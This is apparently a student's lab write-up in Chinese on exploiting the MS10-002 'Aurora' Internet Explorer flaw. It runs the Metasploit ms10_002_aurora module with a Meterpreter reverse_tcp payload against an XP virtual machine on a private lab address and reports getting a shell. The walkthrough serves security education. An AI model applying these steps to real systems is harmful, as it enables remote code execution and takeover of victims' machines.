对浏览器攻击：MS10-002

MS10-002漏洞介绍

• 针对微软Internet Explorer“极光”内存损坏的攻击，当用户查看特制网页时允许远程执行代码。

实践过程

• 命令行使用msfconsole打开msf控制台，然后输入use windows/browser/ms10_002_aurora来使用
• 设置如上图标出的两项内容并使用set payload windows/meterpreter/reverse_tcp设置反弹方式
• 使用show option来看看有什么要用的信息并进行补充：

• 启动服务并开始监听：

• 然后在另外一台虚拟机（XP）中通过IE浏览http://192.168.1.180:80/，回到攻击主机中可以看到攻击成功，测试一下进入shell并查看系统信息：

• 这里从上面看到我尝试了两个虚拟机，第一次没有成功，是老师的XP-SP3里面的IE8，第二个是我自己下的英文版的XP-SP2里面的IE6。